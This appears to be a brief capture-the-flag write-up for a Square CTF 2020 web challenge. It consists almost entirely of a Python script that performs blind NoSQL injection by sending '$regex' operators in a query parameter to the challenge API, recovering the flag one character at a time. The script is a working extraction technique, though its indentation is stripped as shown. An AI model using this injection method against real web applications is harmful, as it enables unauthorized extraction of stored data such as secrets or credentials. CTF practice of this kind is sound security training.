Tags: web nosqli
Rating: 1.5
```py
import requests
import string
url = "http://challenges.2020.squarectf.com:9542/api/posts?flag[$regex]="
flag = "flag{n0SQLn0Vulns"
while True:
for c in '_}' + string.ascii_letters + string.digits:
if c not in ['*','+','.','?','|']:
payload = flag + c
print('Trying: ' + payload)
r = requests.get(url+ payload).json()
if len(r) > 0:
print('Found new character!')
print(flag)
flag += c
if c == '}':
print('Flag obtained: ' + flag)
exit(1)
```